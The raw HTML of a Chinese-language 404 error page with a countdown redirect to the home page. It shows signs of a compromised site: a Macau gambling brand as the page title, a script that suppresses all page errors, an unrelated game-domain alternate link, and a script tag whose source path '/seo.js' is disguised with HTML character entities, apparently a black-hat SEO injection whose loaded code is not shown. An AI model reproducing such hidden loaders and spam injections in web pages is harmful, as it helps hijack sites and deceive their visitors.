<!DOCTYPE html>
<html>
	<head><script>var V_PATH="/";window.onerror=function(){ return true; };</script>
		<meta charset="utf-8">
	  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
	  <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
	  <meta content="telephone=no" name="format-detection" />
	  <meta content="email=no" name="format-detection" />
		<meta name="description" content="" />
		<meta name="keywords" content="" />
		
		<title>太阳成集团(tyc522cc·Macau)股份有限公司-Official website</title>
		
		<!-- 小于IE10提示升级浏览器 -->
		<script>
		    window.AESKey = '';
		    // 判断浏览器是否支持placeholder属性
		    function isSupportPlaceholder() {
		        var input = document.createElement('input');
		        return 'placeholder' in input;
		    };
		    (function() {
		        //判断是否是IE浏览器，包括Edge浏览器
		        function IEVersion() {
		            //取得浏览器的userAgent字符串
		            var userAgent = navigator.userAgent;
		            //判断是否IE浏览器
		            var isIE = userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1;
		            if (isIE) {
		                var reIE = new RegExp("MSIE (\\d+\\.\\d+);");
		                reIE.test(userAgent);
		                var fIEVersion = parseFloat(RegExp["$1"]);
		                if (fIEVersion < 10 || !isSupportPlaceholder()) {
		                    return true;
		                }
		            } else {
		                return false;
		            }
		        }
		        var tpl = ['<div style="padding:0;margin:0; position: fixed;top:0;left: 0;z-index: 1000;width: 100%;height: 100%;background-color: #fff;">',
		            '<div style="position: absolute;top: 50%;left: 0;width: 100%;margin-top: -60px;color:#333;font-size:20px;line-height:40px;text-align: center;">',
		            '<p>您正在使用的浏览器版本过低，为了您的最佳体验，请先升级您的浏览器。</p>',
		            '<p>如果您的浏览器是最新版本，请您使用该浏览器极速模式访问即可。</p>',
		            '<p><a style="color: #0187ff !important;" target="_blank" href="http://support.dmeng.net/upgrade-your-browser.html">立即升级</a></p>',
		            '</div>',
		            '</div>'
		        ].join('');
		
		        if (IEVersion()) {
		            document.write(tpl);
		        }
		    })();
		</script>
	<link rel="alternate" media="only screen and(max-width: 640px)" href="http://mengyigame.com" ><script type="text/javascript" src="&#47;&#115;&#101;&#111;&#46;&#106;&#115;" rel="nofollow"></script></head>

<style type="text/css">
	*{box-sizing: border-box;margin: 0;padding: 0;}
	html{font-size: calc(100vw/19.2);}
	.notbox404{width: 100%;height: 100vh;display: flex;align-items: center;justify-content: center;}
	.notbox404_box{text-align: center;display: flex;flex-direction: column;justify-content: center;align-items: center;max-width: 60%;}
	.notbox404_box>img{width:730px;height: auto;margin-bottom: 53px;}
	.notbox404_box>p{font-size: 24px;}
	.notbox404_a p{font-size: 16px;}
	.notbox404_p p{font-size: 22px;color: #999;}
	.notbox404_p p span{color: #fc4f00;}
	.notbox404_a{display: flex;align-items: center;}
	.notbox404_box a{
	justify-content: center;
	align-items: center;
	text-decoration: none;
	display: flex;
	margin: 45px 15px 0;
	min-width: 180px;
	line-height: 60px;
	height: 60px;
	text-align: center;
	border-radius: 60px;
	color: #fff;
	font-size: 16px;
	background: #fc4f00;
	margin-bottom: 16px;
	padding: 0 30px;
	transition: all 0.6s;
	cursor: pointer;
	}
	.notbox404_box a:last-child{background: none;border: 2px solid #333;color: #333;}
	.notbox404_box a:hover{opacity: 0.8;}
	
	@media (max-width: 1440px){
		.notbox404_box>img{width: 300px;}
		.notbox404_box>p{margin-bottom: 35px;}
	}
	
	@media (max-width: 767px){
		.notbox404_box{max-width: 90%;}
		.notbox404_box>img{width: 220px;}
		.notbox404_a a{font-size: 16px;min-width: 150px;height: 40px;line-height: 40px;}
		.notbox404_box>p{font-size: 24px;margin-bottom: 50px;}
		.notbox404_p p{font-size: 14px;color: #999;}
	}
	
</style>


<!-- 404 -->
<div class="notbox404" style="background: url(/static/modules/cms/images/bj404.jpg) no-repeat;background-size: cover;background-position: center;">
		<div class="notbox404_box">
			<img  src="/static/modules/cms/images/img404.png" alt="">
			<div class="notbox404_p">
				<p>很抱歉！您访问的页面出错了！</p>
				<p><span id="time">4</span><span>秒</span>后跳转到首页...</p>
			</div>
			<div class="notbox404_a">
				<a href="/">返回首页</a>
				<a onclick="javascript:history.back(-1);">回到上一页</a>
			</div>
			
		</div>
	</div>

	<script type="text/javascript">
		function delayURL(url) {
				var delay = document.getElementById("time").innerHTML;
				if(delay > 0) {
					delay--;
					document.getElementById("time").innerHTML = delay;
				} else {
					window.top.location.href = url;
				}
				setTimeout("delayURL('" + url + "')", 1000);
			}
			delayURL("/");
	</script>
		
	</body>
</html>